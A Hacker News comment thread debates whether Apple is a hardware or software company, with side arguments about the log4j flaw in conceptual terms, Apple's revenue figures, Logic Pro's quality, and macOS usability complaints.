    Well besides software that runs in data centers/ cloud most other software is turning to crap. And people who think this crap is fine have now reached to position of responsibility at lot of companies. So things would go only worse from here.

    • sho_hn 20 hours ago

      Except community-developed open source software, which (slowly, perhaps) keeps getting better and has high resistance to enshittification.

      • geodel 20 hours ago

        The OSS that keeps getting "better" is one that accept lot user feature requests and/or implementation. Else maintainers are hostile to users. And when they do accept most of those requests and code we all know how it goes.

      • NetMageSCW 11 hours ago

        Tell that to the people who run gimp development. Open source doesn’t protect from bad decisions and bad directions.

      • Noaidi 20 hours ago

        This right here is moving me back to GrapheneOS and Linux. I was lucky enough to be able to uninstall Liquid glAss before the embargo. I will miss the power efficiency of my M1, but the trade off keep looking better and better.

        being poor, I need to sell my Macbook to get money to pay of my 16e, then sell the 16e and use that money to but a Pixel 9, then probably a but a Thinkpad Carbon X1. Just saying all that to show you the lengths I am going through to boycott/battle the enshitification.

        • pbronez 20 hours ago

          If you already have an M1 MacBook, why no run Asahi Linux?

          • Noaidi 19 hours ago

            Is it functional yet? Last I looked at it was about a year ago. Do you have any real use experience of it?

            • kroaton 13 hours ago

              Look higher up in the thread, someone did a full breakdown.

      • Aperocky 20 hours ago

        Remember log4j? I don't share your enthusiasm.

        At least its open source and free I guess.

        • jacquesm 20 hours ago

          What is your point even? That open source has bugs? The closed source does not have such bugs?

          • Aperocky 19 hours ago

            You won't have that bug if the logger isn't trying to talk to some ldap server.

            It's not even about open source or closed source at this point. It's about feature creep.

            • bzzzt 19 hours ago

              It's not talking to an LDAP server, it's the functionality for talking to an LDAP server that is causing the issue. Even if you don't need LDAP you're still vulnerable when a client can inject information in a log message.

              • Aperocky 14 hours ago

                Why is this functionality needed in the first place? I want to write log, some kind of string, into some kind of files, with rotation, maybe even send it somewhere that expect logs.

                Why parse whatever is in the logs, at all?

                Imagine the same stuff in your SSH client, it would parse the content before sending them over because a functionality requires it to talk to some server somewhere, it's insanity.

                • bzzzt 13 hours ago

                  Log4j contains a very big collection of extensions for just about anything including inserting data from various sources. Of course it's overkill for lots of situation, but nobody ever uses all functionality. It's just that nobody can agree on which functionality is useless ;)

          • geodel 19 hours ago

            Indeed a software used by thousands of commercial products and millions of enterprise applications with ZERO dollar support from either must be maintained at perfect, bug free level by lazy volunteers. Because internet demands it.

            • bzzzt 19 hours ago

              Would it even be possible to create today's software ecosystems by mandating all libraries are maintained and supported to the strictest standards?

              That would be the end of open source, hobbyists and startup companies because you'd have to pay up just to have a basic C library (or hope some companies would have reasonable licensing and support fees).

              Remember one of the first GNU projects was GCC because a compiler was an expensive, optional piece of software on the UNIX systems in those days.

              • jacquesm 18 hours ago

                That would be the end of the software industry. No company outside of aerospace and medical devices is capable of delivering this and I even have my doubts about those two, though at least they are trying.

        • usefulcat 20 hours ago

          That was a bug, not at all the same thing as enshittification.

          • Aperocky 19 hours ago

            It was enshittification. A logging framework that looks up LDAP servers? Why?

            Adding extra features that aren't necessarily needed is enshittification, and very not-unix.

            • bzzzt 19 hours ago

              It's not really added functionality, more unintended consequences of too much flexibility. Java contains JNDI (Java naming & directory interface), a very unified 'directory' system for all kinds of configuration of which LDAP is just one of the backend implementation options. The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

              • Aperocky 14 hours ago

                > The key issue is you can call into other objects which is unwise to do when used with untrusted user input.

                This, and while in this case it is specifically unwise on security terms, there are plenty of other example where the feature are completely cosmetic and deviates from the core user requirements/scenario.

  • SCdF 19 hours ago

    I don't think it's the modern Apple, I think that's just Apple.

    I remember using iTunes when fixing the name of an album was a modal blocking function that had to write to each and every MP3, one by one, in the slowest write I have ever experienced in updating file metadata. Give me a magnetised needle and a steady hand and I could have done it faster.

    A long time ago they had some pretty cool design guides, and the visual design has often been nice, but other than that I don't think their software has been notable for its quality.

    • robenkleene 17 hours ago

      Apple makes Logic Pro, Final Cut Pro, Notes, Calendar, Contacts, Pages, Numbers, Keynote, Freeform, just from a "quality" standpoint, I'd rank any of those applications as competitive for the "highest quality" app in their category (an admittedly difficult thing to measure). In aggregate, those applications would make Apple the most effective company in the world at making high-quality GUI applications.

      Curious if I'm missing something though, is there another entity with a stronger suite than that? Or some other angle to look at this? (E.g., it seems silly to me to use an MP3 metadata example when you're talking about the same company that makes Logic Pro.)

      • SCdF 15 hours ago

        Of those apps you've listed that I've used, none of them have been notable for being high quality to me, though as you say it's difficult to measure. For me I would rate them somewhere between unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote). If you asked me to guess what desktop software Apple makes that people rate highly, I never would have guessed any of those, except _maybe_ Logic[1] and Final Cut, though ironically those are two of the three I've never used.

        I also think you're confusing what I wrote. It's not a competition.

        I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

        [1] and now from a sibling comment I hear that perhaps people regard that tool as bad, so there you go, they jury is clearly out

        • robenkleene 14 hours ago

          What software do you find to be higher quality and why? That's the only valid way of even trying to have this conversation.

          E.g., I'd rank something like VS Code "lower quality" because when I launch VS Code, I can see each layer of the UI pop in as it's created, e.g., first I see a blank window, then I see window chrome being loaded, then a I see a row of icons being loaded on the left. This gives an impression of the software not being solid, because it feels like the application is struggling just to display the UI.

          > I also think you're confusing what I wrote. It's not a competition.

          > I have just found that Apple's hardware on desktop has been stronger than their software, in my experience (periodic sporadic use, ~2006->now).

          I disagree with this, the only way to make an argument that Apple has deficiencies in their software is to demonstrate that other software is higher quality than Apples. Otherwise it could just be Apple's quality level is the maximum feasible level of quality.

          > unremarkable (notes, calendar, contacts!?) and awkward (pages, numbers, keynote).

          This is laughable, Notes is unremarkable? Give me a break, and Keynote is awkward? Have you ever Google'd how people feel about these applications?

          I'd argue a critic only has value if they're willing to offer their own taste for judgement.

      • bigyabai 15 hours ago

        Do you regularly use the alternatives to these programs? Admittedly I'm not cut out to judge the office suite, but the consensus in the music world seems to be that Logic Pro is awful. It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live. Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition. Don't even get me started on the number of pros I see willingly use Xcode...

        It's not exactly clear to me what niche Apple occupies in this market. It doesn't feel like "native Mac UI" is a must-have feature for DAWs or IDEs alike, but maybe that's just my perspective.

        • robenkleene 14 hours ago

          Yes, I use Ableton Live every day.

          > It lacks support for lots of plugins and hardware, and costs loads for what is essentially a weaker value prop than Bitwig or Ableton Live.

          This is an obviously silly statement, not only is Logic Pro competitively priced ($200, relative to $100-$400 for Bitwig, $99-$750 for Live), but those applications obviously have different focuses than Logic Pro (sound design and electronic music, versus the more general-purpose and recording focus of Logic Pro, also you'd be hard pressed to find anyone who doesn't think Logic Pro comes with the best suite of stock plugins of any DAW, so the value prop angle is a particularly odd argument to make [i.e., Logic Pro is pretty obviously under priced]).

          But all this isn't that important because many of these applications are great. DAWs are one of the most competitive software categories around and there are several applications folks will vehemently defend as the best and Logic Pro is unequivocally one of them.

          > Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition.

          This is old, but curious if you have a better source for your statement https://blog.robenkleene.com/2019/06/10/2015-digital-audio-w...

          Found a more recent survey https://www.production-expert.com/production-expert-1/2024-d...

          > We can see that Pro Tools for music is the most popular choice, with Logic for music second and Pro Tools for post coming third.

          Note that I'd say Logic Pro's popularity is actually particularly notable since it's not crossplatform, so the addressable market is far smaller than the other big players. It's phenomenal popular software, both in terms of raw popularity and fans who rave about it. E.g., note the contrast in how people talk about Pro Tools vs. Logic Pro. Logic Pro has some of the happiest users around, but Pro Tools customers talk like they feel like their hostages to the software. That difference is where the quality argument comes in.

          • bigyabai 12 hours ago

            That is an awfully large amount of text for what amounts to an admission that Logic Pro is lower quality software than Pro Tools. Your comment reeks of all the hallmarks of Reality Distortion Syndrome, while I'm willing to argue on merits you simply sound smitten by Apple's (rapidly degenerating) accumen for visual design. In the other response, you're telling off a perfectly valid criticism of Apple software because they won't fulfill your arbitrary demand for a better-looking DAW. Are you even engaging with the point they're trying to make?

            I'm sorry to say it, but I genuinely think you're detached from the way professionals evaluate software. While I enjoyed my time on macOS when Apple treated it like a professional platform, I have no regrets leaving it behind or it's "quality" software. Apple Mail fucking sucks, iCloud is annoying as sin, the Settings App only got worse year-over-year and the default Music app is somehow slower than iTunes from 2011. Ads pop up everywhere, codecs and filesystems go unsupported due to greed, and hardware you own gets randomly depreciated because you didn't buy a replacement fast enough.

            If that's your life, go crazy. People like you helped me realize that Macs aren't made for people like me.

            • robenkleene 11 hours ago

              > That is an awfully large amount of text for what amounts to an admission that Logic Pro is lower quality software than Pro Tools.

              I definitely didn't say this. Pro Tools likely has higher marketshare than Logic Pro, but I don't think anyone would conflate that with quality. I only brought up marketshare because you framed Logic Pro as being unpopular, which is just objectively not true.

              > I'm sorry to say it, but I genuinely think you're detached from the way professionals evaluate software.

              I literally think I've spent more time trying to understand this than practically anyone else e.g., https://blog.robenkleene.com/2023/06/19/software-transitions... but also my blog archives https://blog.robenkleene.com/archive/, it's one of the main subjects I think about and write about.

              Note that how professionals evaluate software is tangential to what "quality" means in the context of software. E.g., I don't think anyone would argue Adobe is the paragon of software quality, but they're arguably the most important GUI software there is for creative professionals.

              Both topics are very interesting to me, what software professionals use and why, and what constitutes quality in software.

              > In the other response, you're telling off a perfectly valid criticism of Apple software because they won't fulfill your arbitrary demand for a better-looking DAW. Are you even engaging with the point they're trying to make?

              I'm not sure what this means, who's talking about a "better-looking DAW" and which point am I not engaging with?

  • alexanderson 21 hours ago

    Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

    Now that they own the SoC design pipeline, they’re really able to flex these muscles.

    • ViktorRay 19 hours ago

      Steve Jobs himself said that Apple sees itself as a software company

      https://youtu.be/dEeyaAUCyZs

      The above link is a video where he mentions that.

      It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he said in a different interview I can’t find right now so I will paraphrase) is that he felt Apple made the best hardware and software in the world so he wanted Apple’s customers to experience the best software on the best hardware possible which he felt only Apple could provide. (I wish I could find the exact quote.)

      Anyway according to Steve Jobs Apple is a software first company.

      • hinkley 11 hours ago

        But Steve also clearly believed in Alan Kay's old aphorism:

        If you care about software you have to make your own hardware.

        I'll allow that perhaps Apple considers hardware a means to an end. But what an end.

    • alt227 20 hours ago

      Apple has always been a software first company, and they only sell the hardware as a vehicle to their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

      EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

      https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

      • achierius 20 hours ago

        > Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

        Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

        • ertgbnm 20 hours ago

          In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.

          • alt227 19 hours ago

            IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, apple not only created and curate the app store, but also invented the concept. In this case they are definitely not a middle man, they are a software company selling access to their software to developers.

        • alt227 19 hours ago

          Where are you getting these numbers from, care to share source?

          We should be comparing profit on those departments not revenue. Do you have those figures?

          It is well known that companies often sell the physicval devices at a loss, in order to make the real money from the services on top.

          • adastra22 18 hours ago

            Apple does not sell hardware at a loss.

            • alt227 18 hours ago

              Yeah, everyone says stuff like this but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, its all guess work.

              • adastra22 17 hours ago

                Apple is a public company. You can find the numbers (broken down into product aka hardware vs service) here: https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

                • alt227 17 hours ago

                  Feel free to do the maths and prove me wrong then.

                  • adastra22 11 hours ago

                    The numbers are literally right there. Did you click the link? In the last quarter, they had $67B in hardware sales, with $45B as costs for that division. That’s a profit margin (hardware only) of about 33%. They are not losing money on hardware.

      • dylan604 19 hours ago

        Apple has always? Sure, maybe today with collection % of sales from apps it looks like a software company. If there was no iDevcies, there'd be no need for app store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran, he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about running the hardware. Whatever Cook thinks Apple is now does not make it always been as you claim

        • alt227 17 hours ago

          You know you might just have a point if you werent completely making that all up.

          Steve Jobs consistently made the point that Apples hardware is the same as everyone elses, what makes them different is they make the best software which enables the best user experience.

          Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

          https://www.youtube.com/watch?v=dEeyaAUCyZs

      • jsnell 20 hours ago

        Sure, let's compare.

        Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

        Their services revenue is $80B with $60B gross margin.

        • justincormack 20 hours ago

          Much of the service revenue is the payment from Google for search placement.

        • alt227 19 hours ago

          Source?

          • jsnell 16 hours ago

            Good grief. Apple's official financials.

            https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

            Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable nubmers, you should have checked the single obvious source for the financials of any public company. Their quarterly statements.

      • ksec 20 hours ago

        It goes back even further, Steve Jobs said Apple is a software company, you just have to buy its hardware to use it. It is the whole experience.

      • wat10000 20 hours ago

        I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

        Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

        • alt227 16 hours ago

          > The hardware doesn't exist merely to run the software

          Watch this and maybe you might change your mind:

          https://www.youtube.com/watch?v=dEeyaAUCyZs

          • wat10000 14 hours ago

            I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

            Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

        • alt227 19 hours ago

          Do the same calculation for profit instead of revenue.

          • wat10000 14 hours ago

            Are those numbers available? In any case, comment said revenue, not profit.

      • HumblyTossed 20 hours ago

        Tim is the CEO, he's going to say whatever he needs to in the moment to drive investment.

        Apple is and always has been a HW company first.

        • alt227 19 hours ago

          OK So I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?

    • Hamuko 21 hours ago

      Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU with not a lot of cores and with thermal challenges, and the reason you bought it was because macOS.

      • chasil 20 hours ago

        And in many decades past, OpenStep was slowly moving its GUI from Next hardware to software sales on various UNIX platforms and Windows NT.

        And this would eventually evolve into MacOS.

        https://en.wikipedia.org/wiki/OpenStep

      • fnord123 20 hours ago

        The intel laptops also grounded into the user. I still can't believe they didn't have a recall to sort that out.

        • hinkley 11 hours ago

          The tingling just lets you know you're alive.

      • alt227 20 hours ago

        > very shitty Intel CPU with not a lot of cores and with thermal challenges

        Very often the intel chips in macbooks were stellar, they were just seriously inhibited by Apples terrible cooling designs and so were permanently throttled.

        They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

        • kllrnohj 19 hours ago

          > They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

          Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

          • alt227 19 hours ago

            I still believe they purposefully throttled the last gen of intel Macs just to make people have bad memories of them.

          • bzzzt 19 hours ago

            I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...

        • scrlk 20 hours ago

          They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.

      • hamdingers 17 hours ago

        Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.

        • NetMageSCW 11 hours ago

          I think “many” is doing a lot of heavy lifting there.

      • leptons 16 hours ago

        >the reason you bought it was because macOS.

        That is probably the least of reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

      • qwertytyyuu 20 hours ago

        not just mac os, also the decent keyboard and actually good display, guarenteed.

  • fidotron 21 hours ago

    What I would do for Snow Leopard on the M class hardware.

    • RossBencina 20 hours ago

      You could run it in an emulator.

    • sys_64738 12 hours ago

      The SL GUI enhancements live with us to this day.

    • asimovDev 19 hours ago

      do you mean literally 10.6 on AS or do you mean something as good as it was

      • fidotron 19 hours ago

        Something that good.

        It was coherent, (relatively) bug free, and lacked the idiot level iOSification and nagging that is creeping in all over MacOS today.

        I haven't had to restart Finder until recently, but now even that has trouble with things like network drives.

        I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

        It shouldn't surprise you I think that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

        • astrange 18 hours ago

          It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.

          • fidotron 17 hours ago

            You mean it only did things you told it to do? That's a feature.

            Programs absolutely could have much more controllable auto save before for when it made sense.

            • astrange 15 hours ago

              "I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

              Speaking of security it didn't have app sandboxing either.

              • fidotron 15 hours ago

                You mean programs could access the file system normally? They were absolutely isolated as standard unix processes.

                This is what I mean about iOSification - it's trending towards being a non serious OS. Linux gets more attractive by the day, and it really is the absence of proper support of hardware in the class of the M series that prevents a critical mass of devs jumping ship.

                • astrange 12 hours ago

                  The only Unix security boundary is between users. There isn't a standard boundary between "a web browser tab" and "the file with your credit card info in it".

  • whitehexagon 19 hours ago

    I dunno, didnt they already crack the 400GB/s memory bandwidth some years ago? This seems like just another small bump to handle latest OS effects sludge.

    Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clock-work MBA driven trickle of slightly better over-hyped future eWaste.

    To outperform during this crisis, hardware engineers worth their salt need to designing long lived boxes with internals that can be easily repaired or upgraded. "yeah but the RAM connections are fiddly" Great, now that sounds like a challenge worth solving.

    But you are right about the software. Installing Asahi makes me feel like I own my compter again.

    • astroflection 19 hours ago

      https://asahilinux.org/

      "Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

      Why the "®" after Linux? I think this is the first time I've seen this.

      • utf_8x 18 hours ago

        The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...

  • thomascgalvin 20 hours ago

    > The modern Apple feels like their hardware teams way outperforming the software teams.

    There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

    If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

    • butlike 20 hours ago

      There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

      Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient curve of improvements, over the earth-shattering announcements of yore (such as the advent of popular cellular phones).

      • scbzzzzz 19 hours ago

        True. I would like to hijack this thread and wante d to discuss what we want for software that is not present. For me. All i can think of is ondevice , al/ml ( photo editing, video editing etc ) and not the ones the current companies are trying hard shove down our throats.

        May be steve is true. We don't know what we want until some one shows it .

  • RataNova an hour ago

    That's been the vibe for a while now

  • tyrellj 19 hours ago

    This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (boot loaders, linux kernel support, etc). Particle released a really cool dev board recently, but the software is lacking. Qualcomm struggled with their new CPU launch with poor support as well. It sometimes takes a while for new Intel processor features to be supported in the toolchains, kernel, and then get used in software.

    Aside from that, I think of Apple as a hardware company that must write software to sell their devices, maybe this isn't true anymore but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task either.

  • textlapse 15 hours ago

    It does feel like Apple is firing on all cylinders for their core competencies.

    Software (iOS26), services (Music/Tv/Cloud/Apple Intelligence) and marketing (just keep screaming Apple Intelligence for 3 months and then scream Liquid Glass) ---- on the other hand seem like they are losing steam or very reactive.

    No wonder John Ternus is the widely anticipated to replace Tim Cook (and not Craig).

  • JKCalhoun 19 hours ago

    There has to be a whole different mindset with hardware though. Every change has to necessarily be more considered, cross-checked. And I don't say this in any way to disparage software engineers (hold up hand) but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)

  • TheAtomic 20 hours ago

    Yup. And the marketing department is ahead of both of them.

  • eloisant 20 hours ago

    Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.

    • steve1977 19 hours ago

      Google has always been a advertising company

      • tempest_ 14 hours ago

        It wasnt always but its defiantly has been the host for the DoubleClick parasite it ingested in the early 2000s

      • hinkley 11 hours ago

        advertising company/feedlot to hoard good engineers and keep them from wandering off and writing a competitor.

    • CharlesW 18 hours ago

      > Apple have always been a hardware company…

      Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

  • kace91 20 hours ago

    There are talks of the hardware head replacing Cook.

    Hopefully that will bring whatever they’re doing right to other teams.

    • butlike 20 hours ago

      I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.

      • thewebguyd 19 hours ago

        Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.

  • elicash 20 hours ago

    For Vision Pro, software team has been impressive. And arguably outperformed the hardware team.

    But this is the exception.

  • foofoo12 20 hours ago

    It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

    Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

  • mproud 18 hours ago

    The hardware team has always shined, but how about one example of this:

    The PowerBook from the mid 1990’s were hugely successful, especially the first ones, which were notable for what we now take for granted: pushing the keyboard back allowing space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. All the while the ’90s roared on, Apple was languishing, looking for a modern OS.

  • mcv 20 hours ago

    I want this hardware available for other systems.

    • ksec 20 hours ago

      Modern ARM C1 Ultra Core is only 10% slower than M5, likely even less when you factor in system level cache and memory. So the gap isn't as wide as most people think it is.

      • mcv 13 hours ago

        That sounds awesome. Can we get laptops with that thing? We should be getting rid of the power hungry x86 stuff.

        • ksec 7 hours ago

          Mediatek and Nvidia should have something out soon.

      • hamdingers 17 hours ago

        What laptops is that chip featured in?

  • nabla9 19 hours ago

    Doing good job is rewarded.

    Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

    • utf_8x 18 hours ago

      Interesting, I thought the next in line was Craig Federighi

  • markus_zhang 20 hours ago

    I pretty much see the Macbook as some fancy toys with mediocre software. Maybe the kernel is solid but other software are very meh, even comparing to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is system programming so naturally a Linux box is more suitable.

    Biggest grief with MacOS software:

    - Finder is very mediocre comparing to even File explorer in Windows

    - Scrollbar and other UI issues

    Unfortunately I don't think Asahi is going to catch up, and Macbook is so expensive, so I'll probably keep buying second hand Dell/Lenovo laptop and dump a Linux on top of it.

    • Sohcahtoa82 19 hours ago

      > - Finder is very mediocre comparing to even File explorer in Windows

      It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (ie, /bin, /etc) without having to memorize some esoteric key combination?

      For fuck's sake, even my home directory is hidden by default.

      > - Scrollbar and other UI issues

      Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

      For years, you couldn't even disable mouse acceleration without either an esoteric command line or using 3rd party software. Even now, you can't disable scroll wheel acceleration. I hate that I can't just make a consistent "one click = ~2 lines of text" behavior.

      I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

      • dd_xplore 16 hours ago

        You know IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps), it comes mainly from the software.

        MacOS doesn't have enough 'openness' to it. There's no debug information, lack of tools etc. To this day I can still daily drive a XP or 98/2000 machine( if they supported the modern web) because all the essentials are still intact. You can look around system files, you customize them edit them. I could modify game files to change their behaviour. I could modify windows registry in tons of ways to customize my experience, experiment lot of things.

        As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

        All the random hardware that we see launching from time to time have drivers for windows but not for Mac. Even linux has tons of terminal tools and customisation.

        MacOS is like a glorified phone OS. It's weirdly locked down at certain places that drive you crazy. Tons of things do not have context menus(windows is filled with it).

        Window management sucks, there's no device manager! Not even cli tools! (Or maybe I'm not aware?) Why can't I simpy cut and paste?

        There's no API/way to control system elements via scripting, windows and linux are filled to the brim with these! Even though the UI is good looking I just cannot switch to an Apple device (both Mac and iPhone) for these reasons. I bought an iPad pro and I'm regretting. There's no termux equivalent in iPadOS/iOS , there are some terminal tools but they can't use the full processing power, they can't multi thread. They can't run in background, it's just ridiculous. The iPad Pro is just a glorious iPhone. Hardware doesn't make a device 'Pro' software does. Video editing isn't a 'Pro' workflow in the sense that it can be done in any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today, does that make the air a 'Pro' device? No!

        • astrange 16 hours ago

          > As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

          It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

          https://limi.net/checkboxes

          > Window management sucks

          I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

          > there's no device manager! Not even cli tools!

          `ioreg -l` or `system_profiler`. Why does this matter?

          > There's no API/way to control system elements via scripting

          https://developer.apple.com/library/archive/documentation/Ac...

          https://developer.apple.com/documentation/XCUIAutomation

          https://en.wikipedia.org/wiki/AppleScript

          https://support.apple.com/guide/shortcuts/welcome/ios

          • robenkleene 10 hours ago

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            The tiling window manager thing is epidemic on Hacker News, and I think the explanation is two fold: Hacker News obviously leans towards programmers, programmers in general don't like the mouse, tiling window managers, as a general rule, are about avoiding needing to manage windows with the mouse.

            The problem with that viewpoint, to me, is that, programming is literally the only complex modern computing task I can think of that isn't mouse-centric. E.g., if you're doing CAD, spreadsheet work, media editing, 3D, audio editing, all of those tasks are mouse-centric and the tiling thing just feels silly to me in that context (like I'm going to put Cinema 4D in a tile?). So it solves a problem I don't have (managing, what, my IDE and terminal windows? this isn't even something I think about) and makes seems like it would make things I think are hard today, even harder (arranging the Cinema 4D Redshift material graph, render preview, object manager, and geometry view where I can see the important parts of each all at the same time, which I do by arranging overlapping windows carefully).

          • Sohcahtoa82 13 hours ago

            > > Window management sucks

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            For me, not so much the window management, but task management. I very strongly believe that the task bar (I guess the Dock bar in MacOS) should have a separate item for each open window of an app. If I have 3 Firefox windows open, that should be 3 entries in the task/dock bar so I can switch between them in a single click. I can do this in Windows, can't do it in MacOS.

            One of the problems I have with MacOS is that it's not obvious how to start a second instance of an app. Sure, some apps will have a "New Window" option. But what about apps that don't, like Burp Suite? If I bring up the launcher, then click Burp Suite when one is already loaded, it just shows me the existing one.

            • astrange 12 hours ago

              You can't start a second instance of an app. Or rather you can (run the app binary from the Terminal) but apps are not required to expect you to do this, and it would probably lead to data corruption from them writing to shared files.

              A weakness of this is you can duplicate apps and launch the duplicate, even though they have the same bundle ID, so they might still fight over things.

            • NetMageSCW 11 hours ago

              No your problem is you brought over your expectations from non-macOS systems and the. expected the Mac to be similar. That isn’t how it works. Do you complain that Windows doesn’t have a bash or that Linux doesn’t support ACLs easily?

              • dd_xplore an hour ago

                Even as kids we were fiddling with batch/bash scripts, how many kids do you see using apple script or whatever? It's the ease of accessibility.

                Powershell now is lot more powerful than what Apple can dream to offer. MacOS is an opinionated OS for people who want to do simple tasks. MacOS apart from good looks offers nothing else.

              • astrange 9 hours ago

                > Do you complain that Windows doesn’t have a bash or that Linux doesn’t support ACLs easily?

                Don't both of those exist now?

                The reason the Mac is more "app-centric" is Conway's law; developers own apps so it's thought if you tried breaking apart an app it would fail, since previous "document-centric" efforts like OpenDoc failed.

        • NetMageSCW 11 hours ago

          All of that is exactly the opposite of what a Pro machine should be. Pros want hardware that works without fiddling to get their real job done. They know that configuring the OS or adjusting the GUI or discussing File Explorer differences is just a waste of time that has nothing to do with their job.

          • dd_xplore an hour ago

            Doesn't the hardware work in Air series? Doesn't the hardware work in windows machines ? Hardware works almost everywhere!

      • dsego 2 hours ago

        > Where's the "cut" option for moving a file?

        You don't cut, you move files, so copy and then choose the move option.

      • cmiller1 18 hours ago

        > Why the hell is there no key to delete a file?

        Cmd+delete? I don't really want it to be a single key as it's too easy to accidentally trigger (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name)

      • aardshark 10 hours ago

        Explorer is not good, and finder isn't much better.

      • BeFlatXIII 15 hours ago

        > Why the hell is there no key to delete a file?

        Command+Backspace.

      • kemayo 18 hours ago

        > Why the hell is there no key to delete a file?

        Command + backspace.

    • lou1306 20 hours ago

